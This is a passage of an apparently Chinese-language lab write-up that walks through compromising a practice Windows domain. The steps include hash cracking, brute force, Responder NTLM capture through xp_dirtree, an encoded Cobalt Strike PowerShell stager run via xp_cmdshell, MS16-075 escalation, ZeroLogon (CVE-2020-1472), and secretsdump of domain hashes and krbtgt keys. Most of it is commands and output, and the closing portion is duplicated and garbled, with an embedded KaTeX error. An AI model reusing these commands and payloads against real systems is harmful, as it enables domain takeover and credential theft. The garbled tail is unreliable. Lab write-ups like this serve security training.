web1:$6$gqtH0Rj2$lxbeVfR7GZMvClPiLmvoOWB6DKjYb0kJe2hVY3IxE6v5qG/C.NhZsBYTPWNkAGxvj7.ETMbwUrssClfI31JG1.:19118:0:99999:7:::
db:$6$Min6QwNX$tpa7Je0y5YhyswU9qtFI7Rh7KN3nI3bNIl.1WKTzhXuSlVvUTetUrpk27Jj8rIQzoPG3GWKLIA78pcW8ZSMfR/:19118:0:99999:7:::hashcat -m 1800 -a 0 -o found.txt hash.txt rockyou.txt
成功破解 一个用户密码
$6$Min6QwNX$tpa7Je0y5YhyswU9qtFI7Rh7KN3nI3bNIl.1WKTzhXuSlVvUTetUrpk27Jj8rIQzoPG3GWKLIA78pcW8ZSMfR/:db123456
5.内网渗透
5.1 对目标信息收集
根据提供的拓扑扫描指定ip 192.168.0.165
└─$ nmap -sV -A 192.168.0.165 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 12:32 EDT
Nmap scan report for 192.168.0.165
Host is up (0.00052s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.3128.00; SP1+
| ms-sql-ntlm-info:
| Target_Name: SCANER
| NetBIOS_Domain_Name: SCANER
| NetBIOS_Computer_Name: DB
| DNS_Domain_Name: scaner.sec
| DNS_Computer_Name: db.scaner.sec
| DNS_Tree_Name: scaner.sec
|_ Product_Version: 6.3.9600
|_ssl-date: 2022-05-07T16:34:22+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-05-05T15:49:41
|_Not valid after: 2052-05-05T15:49:41
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| ms-sql-info:
| 192.168.0.165:1433:
| Version:
| name: Microsoft SQL Server 2012 SP1+
| number: 11.00.3128.00
| Product: Microsoft SQL Server 2012
| Service pack level: SP1
| Post-SP patches applied: true
|_ TCP port: 1433Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.43 seconds只开放了1433端口 而且可以看到这个主机可能存在于域内 db.scaner.sec
hydra -L user.txt -P top1000.txt 192.168.0.165 mssql -vV -f -o ok.txt
使用top1000失败 使用指定密码db123456 也是失败的。 如果这样都失败考虑一下 是不是域用户登录mssql。
5.2 域用户身份登录mssql
─$ python3 mssqlclient.py scaner/db:db123456@192.168.0.161 -windows-auth
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: 简体中文
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DB): Line 1: 已将数据库上下文更改为 'master'。
[*] INFO(DB): Line 1: 已将语言设置更改为 简体中文。
[*] ACK: Result: 1 - Microsoft SQL Server (110 1256)
[!] Press help for extra shell commands
SQL>
成功登录执行 enable_xp_cmdshell 发现用户权限较低
SQL> enable_xp_cmdshell
[-] ERROR(DB): Line 105: 用户没有执行此操作的权限。
[-] ERROR(DB): Line 1: 您没有运行 RECONFIGURE 语句的权限。
[-] ERROR(DB): Line 62: 配置选项 'xp_cmdshell' 不存在,也可能是高级选项。
[-] ERROR(DB): Line 1: 您没有运行 RECONFIGURE 语句的权限。
SQL> 5.3 利用Responder进行NTLMV哈希的窃取
使用 responder选择网卡进行抓包 一定要加上-v 不然只会抓一次
sudo responder -I eth0 -v
在SQL上执行 目的是让他取访问kali
exec xp_dirtree '\\192.168.0.168\test',0,1;
此时kali抓到哈希了。类型是ntlmv1
DB$::SCANER:4088726E576881AF00000000000000000000000000000000:CA91B65F4CDFD004E2A91146B3B805CDDDD05FBD30BD4F18:aea11808f69bdb1e
5.5 hash 破解 ntlmV1
hashcat -m 5500 DB$::SCANER:4088726E576881AF00000000000000000000000000000000:CA91B65F4CDFD004E2A91146B3B805CDDDD05FBD30BD4F18:aea11808f69bdb1e top1000.txt -o found.txt --force
密码是 freepass
使用 mssqlclient 输入密码进入mssql服务
└─$ python3 mssqlclient.py sa@192.168.0.161
Impacket v0.9.24 - Copyright 2021 SecureAuth CorporationPassword:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: 简体中文
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DB): Line 1: 已将数据库上下文更改为 'master'。
[*] INFO(DB): Line 1: 已将语言设置更改为 简体中文。
[*] ACK: Result: 1 - Microsoft SQL Server (110 1256)
[!] Press help for extra shell commands
SQL> 
可以正常执行命令了 但是权限还是 nt service\mssqlserver 比较低的权限 需要进行提权。
5.6 cobalt stike 上线
xp_cmdshell powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADIALwBpAFMAaABMADkASABIADYARgBQADAAUQBDAEIAQwBHADgAQQA3AE0AYQA2AFIAbwB3AFkATQBEAG0AWQBWADQAaABOADQAcQBNAHUAMgAxAHMAagBCAC8AZABiAGIAQwA1AE0ALwAvADkAbABnADMAawBaAG4AWQB5AHUAeQBQAHQASQBpAEcAMwB1ADYAdQBxAHEAMAA2AGQAcgBpADQAcgBtAEQAMABvAGoASgBnAGEAawAxAHkARQB1AFkAYwBsAEoAdABSADAASABhADYAYwBTAHQAMQAzAFgASgBGAHgAWAA3AGsALwAwAGkAawA5AGMARABRAFcAVAA4AGUARABOAHcATwB6AE4ANAArADQAMgBwAHUASwBFAE0ARwBVAGMAbgArAGwANwBpAFkAcQBVAFEAOQBjADUAdgA2AG8AawByAGUARABpAHcASQBiADUANwBuAGsASgBSAGIARQBLAEMAQQA0AGUAMwBlAFgAdQBrAHUAbQBBAG8AZQBxAE8AbgA1AHoAVgBHAFkAZQA4AGQAcwBCAHMANQAyAEwASwBHAHkAVQBlAGUARQA5AHIAKwBNAGUAVgBOAE4ANQAvAGYASwBsAEgAUgBDAEMASABYAFoANQBMAC8AUQB3ADQAeQBuAEYAaAA2ADEAdABZAHAAcgBKAGMAdAArADQAMQBRADQAVAAvAEQARABlAFcAbABoAGoAMwBGAC8AYwAvAFYAdQBoAFoANwB0AGIAMQBiADYASwBSAFcAMQBWADIAMABGAEEAdgBJAFAAaQB0AFoARwByAHEAWABFAEUAQgBjAFcAegBUAFoAWgBKAC8ALwBsAG4ATwB2AHYAeQBVAEgAbwB0AEMASAA2AGcAMgBqAFMAVABWAGkATABLADgASwBHAEEAYgBEAHUAZAA1AGIANQBuADQAdwAzAG4AawBZAGMAegBhAGMAbgBVAGkARQB0AGQAbgBSAFYAVwBwAGwATQBwAEYAeABhAEoAOQAzAEwAaQB2AEgAVAB4AFAAWgAyADkAUgBtAFoANABLAHMAVAB4ADYAeQBCAGoAcQB4AGUAZABUAEIAcQBHAEUAOABDAEcAdgAyAEMAWQB6AG4ATQB2ADgAWAA0AHYAcgA2AC8AYwBIACsALwBlAHoAQQBLAEgAbQBRAGQAYwBFAEIAMgBHAGkAZQBzAHAAbQBCAHgATgBEAGQATgBDAFgAMwBXAFEAagBXAGQAWQBCADcAVQAwAGgAZgBRADUAUgBqAG8ATABUAGgARABNAEEAdQBKAHcATgAxADkAQQA3ACsAagB1AGMAZQBiAGUAQwBXAHcANwBEADMAWgBmAGYAdABmAHUAYQAwAGIARwBwAHgAdQA0AHYANgB1AFUAKwBhAGcARQBVAGgATgBHAHMAdgBrAHIASgAzADQASABEAGkAbgBoAHoAYwBVAGMAaABQAE8AVAA5AHgALwBJAGwAWQBYAGYAVAB3AFQATABwAHIANgBuAFAAcQBFAHEAdwBqAFkAMgBWAEkAYgBmAEcATwBEADcAZwBhAHUAcAB1ADcAdQBYAFoASQBnAGgAbgBzAHoARQBwAFcAYQBpADkANQBVAHIANQBqAGsASgBuAEYAQwBaAFMANgBJADQAbgBYAE0AUwA0AE8AegByAFAALwBtADUAYgBIAHYAVABwAFAAbABmAEcAaQByAGQAdABLADQANgBsAC8AUgBjAC8AUABqAEsAdgBTAHgAZABFADcAMgBtADcAcgBLAHAASwAzAHYAaQArAGIAZAB0AFkATgBvAEkAawAzAGoAOQAxADYAZQBoAGcAMwBYAFQAdwBaADMASQBVAFEAKwBtAGQAaQBOADgANQByAE8AYwBZAGQAMwBHAEMAUgA2AEYAbQA1AGcATQBmAG0AYgBTADEAdwBXAE0ATwBsAGQAMAAwAGoARwBnAEwAegArAHIAQwBRAGUAVAB2AGUAdQAyAEwAcwA3AHgARwB1AFMAZABnAGwAZABBAGkAZQB5AFAAegBsAHgAeQBtAEUAbQBMAGoAbwBRAFAAZwBOAC8AbABIAFcAaAA2AHIAOABNAHgAdwB6AGYAcAA2ADkARwBLAGIAcgB2AEgANwB6AEcAWAAyADcAWgBLAGEAWgA2AGIAQgBIAEQATwB0AFQAeQBuAFkATgBYAEcASwBNAC8AeABEAGoAVwB2AFMAMwB6AEEAMwBHAFMAWQAvAHMAZABkAEsAYgBDAFoAcQBhAG0AVQAzAGMAeQA5AFoAagArAEIAOQBMAHAAMQAyADMAWABnAHgAQQBRAGEAWgBCAGQAZwBtAEMAcwBlADEAawB6AFYAagBsAEgASgBjADMAMABUADQAVgBhAGsAbQBNAGIATgBoAGYAUwBuAG0ATABSAFYAMgA0AFkAagBCADUAYQBPAGsAQgBPAFkAaQBiAEYAUQBXAE0AdwBaAGcAdgBMAC8AegBvADkAcwBRAGMARgBNAFAASABnADIAUABvAEIAMABVAG8AVwA2AHQAbQBwAEEAegBiAG0AZQBxAEkAUgB1AHEAbwBGAFIAKwBqACsANABmAFQAcwBuAGwAMABNAFIAWQAzAFUARAA2AFkAUABUAFEAQQBEAEYAZABsAG0AZQBXADUAcQBFAFEAVgAxAEwANQAzADgAaQAzAHYALwBtADMAbwA4AGwANQBnAGMAMwAyAHcAUgBmAEUANQBsAEoARAB1AEoATABLADIATAB4AGMAVQBrAGsAdABmAGgAeQArAGYAcQBPAFoAWQBJAGMAWQBZAEIAYQBsADcAaQBIAGwAawBwAHgAdgBhAG8AawBaAFMAeQBUAHIAagBRAEMAWAA0AHcAawBhADEAbwBuAFAAZQBIAFkANwBmAHQAOQBZAFEANwAvAEkALwB3AHIAZgBsAGMAWQBqAFEAWQB6AHIAegBVAGIAYQBVAEkAdwBuAHYAUwBMAEEAMQAyAGMATgBqAHIAVgA0AEIAUwBJAHcAYgB4AFYAcgBIAFMATABJAEgAZgAyAGUANABJAHUASABzAGYAdQBjAHkAawA0AFYARQB2AEkARQA0ADgAeQB6AE4ARQBuAHYAMAA4ADcANAByAEgARAA5ADgAdQArADIANgAwAGIAWgB2AE4AcQA1ADYASQAvADMAWgA1AEsAMgA3AFgAWQBmAGQAcgAyAHUAdABYACsAawBuAFoAagArAGIANQA0AGIASABYADkAZAB0AE8ARgA4AGEATgA0AGIATABzAEQAMABHAHYAVQBQAGEAZAAxAFEAbABVAHMARABPAHAANABQAGQASgBPAEYAZABiAEEAcQBoAEYARwB3ADIAVgBPAEsAWgBaADYAeQAwAGcAZQBMAFEAVgBQAFYAaAB3ADAAMgBwAGEAbQAzAFkARgA4AEwAZwBzAHMATABLAEwAKwByAEkAZwBFAHUAawBGAEwAWAA2AGgATQB0AGsATQBQADQAaABRAHIAaABsAEoAMwBCAHAARwBpAHQAQwBKAHQAVAA3ADIAeABJAGwAbABhAFgAeAA2AGgAbwBkACsAbwBvAFgATQA1ADYAcwBwAFYAdwBDAEYAVQBJAG0AbgAzAFgARQBlAGgAdAB1ADYAZQB0AEwAVQA4AGkAdgByAFAAYwBnAC8AcwArAHMASABLAHEAUABZAGwAcABRAEsAMgBGAFIAUwBlADAASQBLAE8AQgAzAFAAMgBYAEoAbQBvAGgAMgBvAFUATwBkAFcAMgBhAEkAbgBoAFMAUABQAFkAYwBqADIAbwBFAHoAVgBxAGUAeQBNAFQAYgAxAHMANgBpADMAVQBIAG8ANAAwAHgAYQBBAHIAcwA0AHAAKwBpAHoAQwBJAEUAdAB1ADMAKwB2AEQATQBFADIAMAA1AGIAawBpAEEAWABhAHEAMgBMAEYAeQBBAHoAcABDAGIAWQBhAGgAQgBmAE4AQwBVAHIAcQBsAHQAYQBSAFQANQBKAHMAKwBWAHkAMwB6AFAAbABoAHAASABUADIANQB0ADkAegBvADQAQwB4AEgAcgBCAGIAdQBCAFkALwBtADcAdgBEADAAZQAxAFIAKwArAG8AYgBjAGYAaQBSAG8AegBDAGMAYQAxAHQAVgBzAEoAeQBuAFQAeAByAGEANwBJADUAagArAHUAVABhAHQAaABwAHQAMAA2ADIAVgBhAE0AVwBiADkAUQBXAEoAYwBWAGMANABpAGwAZgBEADcAWABSAG8AegAvAFAAbQBmAFIAYwBFAGkAcgB5AE8AZAB6AFcASAA4AFgASwBaAGoAcQB6AGgAZgBIAHoAZgB0AGEAYgBMADcAVQBOAFgANgA1AEoAcQA0AFUAMwBtAFIAZABGAHEAWABzAHEAegB2AGsAVAA0ACsAZABDAGIAVAA2ADEAMABYAEMANgBhAFAAWgA2AHYAQgB4AG8AUABlAC8AQQBoADEATgBaAEMASQAwAE8AZwBuAHoATQBpAHUARgBpAHcAYwBzAE0AbgBhAFIAVgBaAHkAWQArADgAeABVADAAVQAvAFkAbwB0AHAAZgBZAGEASgB0AFYAVAB6AHkASgAzAHMANQBUAEYAbAB0AFUAbgBSAEIARABSACsATgA1AFUAMwBtAGUAYQArAHUAegA1AGMAcwB0AFEAbgBQADgAcwBYAHMATwB4AE0AZQBhAFcASgBRAGYAZQBlAEUAMAB6AGEAMwBWAHEAaABCAE8AbABaADIANgB0AEQAcgBIAFoAbABPAFAAbQBwAHMATgBZAGoAYgBaAHUAOAAzAEkASwB0AFUAYgBKAHQARwAzAC8AVgByAEQAbgA4ADkAeQA5AGUATgAwAHUAQgBsAE4AcgBYADEANQAwAHgAbwBKAGoANABJAGMATgB1AHUAVwBwAFYAUwBGAFUALwBWAHcAbgB2AEoAbQA2ADMAbQBXAHMAeQBtAC8ARQBtAHAAVQAxAC8AZgByADgASABTAGMANwBUAG8ASABxAHQAaQBDADcAawA2AGUAYwA2AHUAVgBVAFAAYgBuAFAAVwBsAEsAMABNAFkAdwBwAE8AWgBjAG4AcAAvAE8ANQA4AGUAbgBzADkAUQBxAEcAcwBQAEsAWQBOAEwAYQBTADgASwBnAC8ANgBnAHkAWgBLAHEAbgBvAE4AeABkAFQANgBiAFYAZgBjADAAOQBpADcASgBiAGEALwBSAFEAVQB6AGkAcwBEAGQAYwBGADEAbgBxADAAdAAwAEwAYQBjAFcARgB0AEgAQQB1AHIASABXAE4AUwBYAFAAcwA3AFEAOQBTAGUAOQBGAFgAUAB4AGsAdABLADIAagAzAGMAYwBmAG8AVABNAHAAMQB0AFcAdgByADQAUwBCAC8ASAA0ADUAWgBnAFMAQwB2AE4AdwBpAHMAbABxAGsAMgBOAGwAcQBqAHQAbABqAHoAdwB2AEYAaABUAFcAdwBoADQAcQBxAHoAawBrAFgAZwBHAFAAaABlAHAASgBaAFkAbABDAHcAbgBzAGEAVgBmAHAAOQBJAEMASABwAHcAUAB3AEIAWABoAGsANQBwAHoAQgB5AGEAZgBBADAAMABqAHEAaQBKAEUAYwBjAHoAVgBrAEsAbQBrAGwAWABDADMAcAB0AHQAKwBlAG0AdABYAGgAMQBsAHIAUwB6AFYATgBWAEMAbwBZAFYAZAB0AGEARQBuAFQAdQBEAFgAQwAxADcAawBKAC8AawBHAGMAawArAFUALwBwAGgAWABJADEAMABsADAAQgAvAEUAYwBaADMAOQByADgANABlAEQANwBZAGoASAB1AHYATgAxAEIAbABvAEkARABGADgANwBsAGMATgByADcAMwAzADEAZABlADcAcwBQAFgAVwA1AC8AMgAvAHYANgB3AEQAYwBGAGEAcABSAGIAWAByAG0AVABsAHEASAA2AG8AVwBMADkAcQBmAGkAUwBWADAASgAxAHEAUQB5AFcARABCAHUAWgAyAC8AWABSAGQAMAByADIAMgBJAFIAUABYAGoARABVAHkAbQBjADgANwA1AHoAMABtAEQAcgBhAGgAcQA0AFMAKwA4ADEAYQAwAGUAZAB0ADIAdABiAGgAeAArAGsAVQBIAEEAMgAzAGMAcABiAGwANgBoAGMAdABwAEEAYwBOAEsAKwBkAE4AUgBsAG4AcwBYAGgARwA3AHAARQB0AE0AMgAwAFAAVwBrAHUAYgBoAEcAZQBPAHUAeABiAG8ASgBmAHYAbQB3AGcAdgBQAHcASABFAEUAZgBZAE0AZABnAHUAegB4AFgARABTAHIARgBZAGoASgAvAFYAWQBqAGIAMQArADcAQwAwAFgAUwAvAEsAdgBKAHYATAB4ADgAMwBWAEIAMAA4ACsANwBtAFEAbgBPADIAVwB2ADYASgBQAEEATwBlAEQALwBZAHcASgArADIAUABTAC8AUQB4AHUARABsAC8AUgBuADcAOQBBAGwARABuADIATwBWAHoAYQBWAC8AaQBPAFYARQBuAFgAdQB3AHoAdwAxAHoALwBEADEAZwBYADIAdQBrAFgAQwBQAEEAcwAzAFoAZwArAFYAdQA0AFYATQBsAHUAWABzAHoAOQAyAHEAVwBFADQAVQAxAGQANgA5AHkAMwA3AGsASABDAEkAKwBuAGwAVABKADgAcgB4AEEAagBpAEMAOQBpADcAdgBMADUAOQBZADAANwBxAGUAWgBGADgAUgBzADMAdwB4AHEARwA5AHYAbABoADQARwA2AEIAcABSAGoANgBxAGQAaAAwAFkAaQBRAFcAaAByAG0ALwBBAGMALwBNAHYAOABMAFAARABRAEEAQQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==
使用 ms16075 提权 到system
抓取凭证
* Username : DB$
* Domain : SCANER
* NTLM : 936a440598db1c326ad86ba68d73370d
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e7d7b11f5b4352988cddcd12daa1510:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
6.内网域渗透
6.1 查找域控
[*] Tasked beacon to import: D:\pentest\cs\CS插件\.\powershell\PowerView.ps1
[*] Tasked beacon to run: Get-NetDomainController (unmanaged)
[+] host called home, sent: 236001 bytes
[+] received output:Forest : scaner.sec
CurrentTime : 2022/5/8 1:19:37
HighestCommittedUsn : 13392
OSVersion : Windows Server 2012 R2 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : scaner.sec
IPAddress : 10.10.10.135
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : ad.scaner.sec
Partitions : {DC=scaner,DC=sec, CN=Configuration,DC=scaner,DC=sec, CN=Schema,CN=Configuration,DC=scaner,DC=sec, DC=DomainDnsZones,DC=scaner,DC=sec...}6.2 开启代理访问域控
beacon> socks 1088
[+] started SOCKS4a server on: 1088
[+] host called home, sent: 16 bytes
sudo vi /etc/proxychains4.conf
proxychains4 nmap 10.10.10.135 -p 88 -sT -Pn
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 22:20 EDT
[proxychains] Strict chain ... 127.0.0.1:1088 ... 10.10.10.135:88 ... OK
Nmap scan report for 10.10.10.135
Host is up (0.011s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
6.3 ZeroLogon(CVE-2020-1472) 提权域控
CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Server 2008R 2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为windows,该漏洞的稳定利用方式为重置目标域控的密码, 然后利用城控凭证进行Dc sync获取域管权限后修复域控密码,之所以不直接使用坏控凭证远程执行命令,是因为城控账户是不可以登录的,但是域控具备Dc sync权限, 可以获取域内任意用户的凭证。
漏洞利用过程中会重置域控存储在域中(ntds.dit)的凭证,而域控存储在域中的凭证与本地的注册表/lsass中的凭证不一致时,会导致目标域控脱域,所以在重置完域控凭证后要尽快恢复。
└─$ proxychains4 python cve-2020-1472-exploit.py ad 10.10.10.135
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Performing authentication attempts...
[proxychains] Strict chain ... 127.0.0.1:1088 ... 10.10.10.135:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1088 ... 10.10.10.135:49158 ... OK
=====================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
proxychains4 python3 secretsdump.py scaner/ad\$@10.10.10.135 -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1088 ... 10.10.10.135:445 ... OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:1088 ... 10.10.10.135:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1088 ... 10.10.10.135:49155 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:699ff4337d59499ab67f9967ace8afec:::
scaner.sec\db:1106:aad3b435b51404eeaad3b435b51404ee:5a63042c9c9d2e99956f1414e2bfcee6:::
scaner.sec\moonsec:1109:aad3b435b51404eeaad3b435b51404ee:51a52c415264a8fc31520f66f2f50459:::
AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
12SERVER-DB$:1107:aad3b435b51404eeaad3b435b51404ee:3ebf8c0281893b7661e0897d434fd900:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:2978bba376f83eab7acfd4a2e3c68f41b0fbf90f85014d8ec136cb0f9ab06460
krbtgt:aes128-cts-hmac-sha1-96:e73c9453f5df1077d1132c562c3b20df
krbtgt:des-cbc-md5:91f2ab6198c1adf2
scaner.sec\db:aes256-cts-hmac-sha1-96:21a881e53c7acb3ca6dfe29b94ad56f90e72f3771695e3413a1eda1394b076b5
scaner.sec\db:aes128-cts-hmac-sha1-96:83044b37dab189c04fff6d5ca76a4251
scaner.sec\db:des-cbc-md5:f2cd2c3bceae0dcd
scaner.sec\moonsec:aes256-cts-hmac-sha1-96:39054a2b86cb867177d23678dd40f2cfe89eaaa69f4a5e36725585cc0ad2faac
scaner.sec\moonsec:aes128-cts-hmac-sha1-96:fee3562d30d7a5556e87962382c828c6
scaner.sec\moonsec:des-cbc-md5:f1160b49cd8654e5
AD$:aes256-cts-hmac-sha1-96:182d64eca1353b996e52514e769373643eb9d0ad78c8203ddfe9be00ff9e2930
AD$:aes128-cts-hmac-sha1-96:9b3827f3d3c26a50b1ca574908577948
AD$:des-cbc-md5:e6fd2cae86c479fb
12SERVER-DB$:aes256-cts-hmac-sha1-96:2caf760f94b8b8c25d33ae599748f5f9e8a9b7770dd79cde858276b4c22cb423
12SERVER-DB$:aes128-cts-hmac-sha1-96:43aa58ec20e5067c32f81d7827e0d786
12SERVER-DB$:des-cbc-md5:97cb313b2931c7c7
[*] Cleaning up...
6.3 登录域控服务器
proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb Administrator@10.10.10.135
6.4 设置cs转发
6.5 获取域控权限
记得关闭防火墙
netsh advfirewall set allprofiles state off #关闭防火墙
netsh advfirewall show allprofiles #查看防火墙状态
shell net use \\10.10.10.135\ipc$ "QWEasd000" /user:scaner\administrator
shell dir \\10.10.10.135\c$
jump psexec64 10.10.10.135 rve
6.6 恢复域控密码
导出文件
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del system.save
del sam.save
del security.save
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation[*] Target system bootKey: 0x3598ef959977a32edee6a7e37fa84031
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:3c6da21c49ad3ad0576f9ae27a373f29e4ba38394dbb9226a09399c45a82afbdf0a5fe04c97e564511800fc4f05c16c7d3c82cd37e9abbfd303d444bf98389a38e0dd0ee4f36d9ea8b11ee90c4a22da811eb35e036405ccf89913b95c353b2f90466c69a076afc338a6d2fe2cd8a185b9f656b92da5ee93bb098e82962f14d6813228a806e4a9fea4b3d5112a3ee799fe88f8767b03caf546cd59903b5a8d7e6ab3d6f3683024e74e3928df3cdf0791f3e58dc35c7a83344f020c22e2a42dd264d9a8f150d6d626955b8920e8559f90f9761ecf9d75976acb3762ab4468f3dac577ef1f52b89a6c8a13de18e21497c38
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:049d2188a55da0d1511d4391043c3a68
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0xdaf7eb3f8c0c99f3a9d8294f8d8c20c66eb4bf38
dpapi_userkey:0xc74d45a5227c64b3efa07ce8d331c7d224891ed5
[*] NL$KM 0000 AA C3 E0 AC C2 DA 1C 8A E2 DB 90 CA 31 0B 7E 7A ............1.~z0010 6F 59 D2 1E BE 59 7D 65 25 B2 88 77 DE 20 C5 B2 oY...Y}e%..w. ..0020 92 A6 4D 30 2D 1F 40 7D 64 2D 47 3B 92 C4 04 9D ..M0-.@}d-G;....0030 EB DE 94 64 A6 7F 7F 5C 13 61 F4 C8 6E BA 0E B5 ...d...\.a..n...
NL$KM:aac3e0acc2da1c8ae2db90ca310b7e7a6f59d21ebe597d6525b28877de20c5b292a64d302d1f407d642d473b92c4049debde9464a67f7f5c1361f4c86eba0eb5
[*] Cleaning up... proxychains4 python3 reinstall_original_pw.py ad 10.10.10.135 049d2188a55da0d1511d4391043c3a68
NetrServerAuthenticate3Response
ServerCredential: Data: b'\\i\x84|TW3O'
NegotiateFlags: 556793855
AccountRid: 1001
ErrorCode: 0 server challenge b'\\\xb1\xbd\x1d,tPS'
session key b'?:\x1a\xd4\x1f\x91\xda\xfb\xa3G\xed\r\x1b\xd0\x03h'
NetrServerPasswordSetResponse
ReturnAuthenticator: Credential: Data: b'\x01C\x19\x91X\xca\x8d\x7f' Timestamp: 0
ErrorCode: 0 Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.验证
proxychains4 python3 secretsdump.py scaner/ad\$@10.10.10.135 -no-pass
b435b51404ee:049d2188a55da0d1511d4391043c3a68
[] DefaultPassword
(Unknown User):ROOT#123
[] DPAPI_SYSTEM
dpapi_machinekey:0xdaf7eb3f8c0c99f3a9d8294f8d8c20c66eb4bf38
dpapi_userkey:0xc74d45a5227c64b3efa07ce8d331c7d224891ed5
[] NLKaTeX parse error: Expected 'EOF', got '}' at position 146: … C5 B2 oY...Y}̲e%..w. .. 0020…KM:aac3e0acc2da1c8ae2db90ca310b7e7a6f59d21ebe597d6525b28877de20c5b292a64d302d1f407d642d473b92c4049debde9464a67f7f5c1361f4c86eba0eb5
[] Cleaning up…
proxychains4 python3 reinstall_original_pw.py ad 10.10.10.135 049d2188a55da0d1511d4391043c3a68
NetrServerAuthenticate3Response
ServerCredential:
Data: b’\i\x84|TW3O’
NegotiateFlags: 556793855
AccountRid: 1001
ErrorCode: 0
server challenge b’\\xb1\xbd\x1d,tPS’
session key b’?:\x1a\xd4\x1f\x91\xda\xfb\xa3G\xed\r\x1b\xd0\x03h’
NetrServerPasswordSetResponse
ReturnAuthenticator:
Credential:
Data: b’\x01C\x19\x91X\xca\x8d\x7f’
Timestamp: 0
ErrorCode: 0
Success! DC machine account should be restored to it’s original value. You might want to secretsdump again to check.
验证proxychains4 python3 secretsdump.py scaner/ad$@10.10.10.135 -no-pass
感谢月师傅的靶场。
每个人的心里,都有一个忘不记,却无法拥抱珍惜的人。
